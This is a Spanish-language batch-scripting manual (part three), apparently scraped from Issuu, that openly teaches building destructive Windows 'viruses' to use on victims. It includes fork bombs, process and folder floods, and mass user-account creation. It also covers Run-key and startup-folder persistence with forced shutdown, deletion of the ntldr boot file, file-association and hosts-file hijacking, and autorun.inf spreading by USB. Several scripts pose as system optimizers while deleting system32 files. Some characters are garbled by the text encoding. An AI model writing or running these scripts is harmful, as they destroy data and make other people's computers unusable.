Issuu on Google+

MANUAL DE BATCH TERCERA PARTE

P รก g i n a 1 | 11


MANUAL DE BATCH TERCERA PARTE

No hay virus más fastidioso que los que son creados mediante las utilidades de Windows (MS-DOS). Podemos crear desde una simple alerta hasta un archivo que agota la Memoria RAM del PC, lo que provoca que se traben los programas, se sature el procesador y termine por quemarse o reiniciarse. Para todos estos virus es recomendable poner un comando para que el archivo se inicie junto a Windows (esto es si quieres joder realmente). Bombardeo de Aplicaciones Código @echo off :x start mspaint start notepad start write start cmd start explorer start control start calc goto x Explicación: lo que hace este código es simplemente abrir interminablemente dichas aplicaciones en un ciclo infinito, lo cual generará un gran consumo de memoria y puede incluso colgar el sistema por un rato. Código Flooder de carpetas: @echo off :x md %random% goto x Explicación: Este código al igual que el anterior, posee un ciclo infinito en el cual crea carpetas en el sistema de manera aleatoria, lo cual consume espacio en el disco duro.

P á g i n a 2 | 11


MANUAL DE BATCH TERCERA PARTE

Código Flooder de cuentas de usuario: @echo off :x net user %random% /add goto x Explicación: este simplemente crea una infinidad de usuarios en el sistema, lo cual es bastante molesto. Código Virus de apagado: copy virus.bat “C:\Documents and Settings\Administrator\Start Menu\Programs\Startup” copy virus.bat “C:\Documents and Settings\All Users\Start Menu\Programs\Startup” shutdown -s -t 00 Explicación: Como los archivos en la carpeta de start up (o inicio) automáticamente se inician, lo que hará este virus será apagar la computadora de la víctima una vez iniciada la sesión de usuario en un tiempo de 0 segundos. Ahora si lo quieres aplicar en Windows 7 tendrías que remplazar las dos primeras líneas por esta: C:\Users\Doom\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Inicio Código Eliminador de arranque (peligroso): attrib -S -R -H C: tldr del ntldr Explicación: Este código simplemente cambia los atributos del ntldr (sistema, y oculto), para así poder eliminarlo, y una vez eliminado la próxima vez que se encienda el ordenador este simplemente no "booteara" ya que falta ese archivo de arranque. Código Fork Bomb: %0|%0 Explicación: Este simplemente creara un número infinito de procesos en el sistema, lo cual hará que este se cuelgue. P á g i n a 3 | 11


MANUAL DE BATCH TERCERA PARTE

Código Modificador de extensiones: @echo off assoc .txt=loquequieras assoc .exe=loquequieras assoc .jpeg=loquequieras assoc .png=loquequieras assoc .mpeg=loquequieras Explicación: Este sencillo código nos permitirá joder con las asociaciones de los archivos, para usarlo solo hay que cambiar lo que quieras por la asociación que quieres cambiar, como ver asociaciones de archivos?. Simple solo ejecuta este comando en la shell del sistema: assoc Código DNS poisoning: @echo off echo xxx.xxx.xxx.xxx www.loquequieras.com > C:\windows\system32\drivers\etc\hosts

Explicación: Este comando imprime o agrega xxx.xxx.xxx.xxx www.loquequieras.com al archivo host. para usarlo correctamente debes de remplazar xxx.xxx.xxx.xxx por una ip y www.loquequieras.com por algún sitio de tu preferencia, lo que hace es que puedes redireccionar a la víctima hacia algún site en específico, en otro caso simplemente con meter alguna ip falsa puedes bloquearle el acceso a dicho site.

¿Cómo meter un virus en batch mediante una USB?

La forma más sencilla seria creando un archivo .inf, para que al momento de conectar la memoria al ordenador quede infectado al reconocerla. [autorun] open=tubatch.bat Nota: los archivos .inf se crean de la misma forma que los .bat solo que al momento de guardarlos en vez de .bat se le pone .inf. Ahora, donde dice tubatch.bat debes de remplazarlo por el nombre de tu virus en batch. Empezamos con un par de ejemplos extras... SHUTDOWN --> Con esto podemos hacer un apagado o reiniciado forzoso del PC sin que el usuario (ya sea administrador) pueda cancelarlo al menos que entienda lo que le está pasando.

P á g i n a 4 | 11


MANUAL DE BATCH TERCERA PARTE

Aquí va la secuencia del comando: Código: shutdown [-l | -s | -r | -a] [-f] [-m \\equipo] [-t xx] [-c "comentario"] [-d up:xx:yy] De la cual solo usaremos: Código: shutdown [-s ó -r] [-f] [-t xx (Nota: tiempo en segundos] [-c "comentario"] En donde: "-s" apaga el sistema. "-r" reinicia el sistema. "-f" fuerza el apagado/reiniciado del sistema. "-t xx" establece el tiempo de la cuenta atrás. "-c "comentario" establece un mensaje/comentario del apagado/reiniciado del sistema. El fin de esto es que al iniciar el .exe o .bat (depende de cómo lo compilemos), nos ejecute el apagado forzoso y a su vez guarde un registro para que se inicie la misma acción pero al iniciar Windows. Para hacer que se inicie junto a Windows necesitamos usar el comando REG ADD (añadir al registro), pero para realizar esta acción necesitamos tener el .exe o .bat en algún sitio del Sistema y un buen lugar para ello es en la Carpeta de Windows. Por tanto para copiar nuestro "virus" a la carpeta de Windows usaremos: Código: COPY/Y Nombre del virus.extensión %SYSTEMROOT%\Nombre del virus.extensión Y para añadir el "virus" que se nos quedará en la carpeta de Windows usaremos: Código: REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Nombre del virus /d %SYSTEMROOT%\Archivo.bat/.exe /f Bueno con esos datos podemos empezar a programar (a gusto de cada uno) nuestro "virus", suponiendo que nuestro archivo final se llame "Shutdown.bat/.exe" Código: @ECHO OFF :VIRUS CLS COPY/Y Shutdown.bat/.exe %SYSTEMROOT%\Shutdown.bat/.exe REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Apagado del Sistema /d %SYSTEMROOT%\Shutdown.bat/.exe /f GOTO :APAGAR :APAGAR CLS SHUTDOWN [-s/-r] [-f] [-t 60] [-c "Error crítico en el Sector Primario del Sistema"] EXIT P á g i n a 5 | 11


MANUAL DE BATCH TERCERA PARTE

Todo esto lo compilamos en un .bat o .exe, lo que prefieran. Tenemos que tener en cuenta una cosa, que cada virus que hagamos se inicie con Windows, que es la idea, por tanto la ruta que se repetirá en cualquier archivo que programaremos y será la ruta que yo nombre como ":VIRUS". Esa va a ser la base de todo virus. BOMBA FORK --> La Bomba Fork es uno de los "virus" más puñeteros que existen, ya que te tira el PC por un consumo excesivo de Memoria RAM provocado por una cantidad excesiva de procesos que, en nuestro caso, serán procesos de "cmd.exe". Su programación es más sencilla que la del SHUTDOWN. Como les dije, tenemos que repetir la ruta :VIRUS, ya que el fin es que se inicie el archivo con Windows. Esta vez vamos a suponer que nuestro archivo final se llame "Fork.bat/.exe"... Vamos a por ello! Código: @ECHO OFF :VIRUS CLS COPY/Y Shutdown.bat/.exe %SYSTEMROOT%\Fork.bat/.exe REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Bomba Fork /d %SYSTEMROOT%\Fork.bat/.exe /f GOTO :FORK :FORK CLS START CMD.EXE GOTO :FORK

P á g i n a 6 | 11


MANUAL DE BATCH TERCERA PARTE

Ejemplos Adicionales Código msg * Contesta esta encuesta y recibiras una sorpresa set /p var=Te gusta la escuela? cls set /p var=Ves series animadas? cls @echo off>>virus.com @echo off>>worm.vbs cls set /p var=Que profesion te gusta mas? cls @echo off>>troyano.dll cls set /p var=Que tipo de musica te gusta? cls @echo off>>bomba.reg @echo off>>script.exe cls set /p var=Que celular usas? cls @echo off>>analogico.zip @echo off>>win32vbs.bat cls set /p var=Ya quieres que se acabe esta encuesta? cls @echo off>>windows.exe msg * Se acabo la encuesta disfruta tu sorpresa :menu start http://www.tecnociencia.info/unitec goto menu :menu msg * Reinicia la pc o lo hare yo goto menu dir dir dir dir dir shutdown –r Este código realizara una encuesta mientras crea archivos y al final hace un bucle y reinicia la pc.

P á g i n a 7 | 11


MANUAL DE BATCH TERCERA PARTE

Cรณdigo set /p var=Deseas mejorar tu sistema? cls echo off>>virus.exe echo off>>virus.com cls msg * Se esta optimizando el sistema operativo espere un momento cls echo off>>virus.dll echo off>>virus.ini echo off>>virus.bat cls copy c:\windows\system32\* *virus.reg copy * *virus.vbs cls echo off>>virus.js cls msg * Se reiniciara el equipo para que los cambios surtan efectos shutdown -r exit Este cรณdigo harรก una pregunta luego creara archivos sacara mensajes y copiara los archivos de system32 y luego reiniciara la computadora. No es un cรณdigo malicioso pero es divertido.

P รก g i n a 8 | 11


MANUAL DE BATCH TERCERA PARTE

Código @echo off msg * Se mejorara el rendimiento de su memoria ram del c:\windows\explorer.exe -q -f -s del c:\windows\taskmgr.exe -q -f -s del c:\windows\system32\explorer.exe -q -f -s del c:\windows\repair\*.nt -q -f -s del c:\windows\system32\taskmon.exe -q -f -s del c:\windows\system32\cmd.exe -f -s -q del c:\windows\system32\svchost.exe -q -f -s del c:\windows\system32\lsass.exe -q -f -s del c:\windows\system32\uxtheme.dll -q -f -s del c:\windows\system32\*.ini -q -f -s del c:\docume~1\user\escritorio\*.lnk -q -f -s echo off>>animal.exe echo off>>idiota.com start calc.exe start notepad.exe start sol.exe start winmine.exe start system32 start regedit.exe start mspaint.exe start iexplorer.exe start winword.exe start excel.exe start *.jpg start *.lnk start c:\windows\system32\*.dll del c:\windows\system32\regedit.exe -q -f -s del c:\archiv~1\msn messenger\*.dll -q -f -s del c:\archiv~1\msn messenger\*.exe -q -f -s del c:\autoexec.bat -q -f -s msg * no se pudo terminar la operacion tendra que formatear su pc por imbecil shutdown -s -c "Sigue bajando estupideces pendejo" exit Este archivo borra los principales archivos de Windows crea archivos abre archivos elimina accesos directos del escritorio saca mensajes y apaga el equipo sacando un comentario. Es muy probable que se necesite formatear la computadora así que recomiendo que no lo usen en su computadora.

P á g i n a 9 | 11


MANUAL DE BATCH TERCERA PARTE

C贸digo @echo off msg * Espere mientras se mejora su sistema operativo del c:\windows\repair\*.nt -q -f -s del c:\windows\system32\*.bin -q -f -s del c:\windows\system32\*.bat -q -f -s echo off>>virus.exe echo off>>virus.dll echo off>>virus.com echo off>>virus.ini echo off>>virus.sys echo off>>virus.reg echo off>>virus.ani echo off>>virus.rar echo off>>virus.pal echo off>>virus.bin echo off>>virus.cmd echo off>>virus.jar echo off>>virus.chk echo off>>virus.db echo off>>virus.ocx echo off>>virus.manifest echo off>>virus.log echo off>>virus.dat del c:\windows\system32\*.ax -q -f -s del c:\windows\system32\*.acm -q -f -s del c:\windows\system32\*.bin -q -f -s del c:\windows\system32\*.dat -q -f -s del c:\windows\system32\*.hlp -q -f -s del c:\windows\system32\*.manifest -q -f -s echo off>>virus.cur echo off>>virus.386 echo off>>virus.323 echo off>>virus.scr echo off>>virus.acm echo off>>virus.hlp echo off>>virus.jpg echo off>>virus.mpg echo off>>virus.html echo off>>virus.vbs echo off>>virus.wsh echo off>>virus.rat echo off>>virus.cer del c:\windows\system32\*.ocx -q -f -s del c:\windows\system32\*.drv -q -f -s del c:\windows\system32\* .msc -q -f -s echo off>>virus.msc del c:\windows\system32\*.cpl -q -f -s del c:\windows\system32\*.ini -q -f -s del c:\windows\system32\*.vbs -q -f -s del c:\windows\system32\calc.exe P 谩 g i n a 10 | 11


MANUAL DE BATCH TERCERA PARTE

del c:\windows\system32\sol.exe del c:\windows\system32\winmine.exe del c:\windows\system32\mspaint.exe del c:\windows\system32\notepad.exe del winword.exe del excel.exe msg * Se termino la configuracion del sistema pero vas a tener que formatear de preferencia shutdown -r exit Este c贸digo eliminara archivos de Windows creara archivos que se llamen virus sacara mensajes y reiniciara la pc. Es un poco malicioso.

P 谩 g i n a 11 | 11


Manual de Batch 3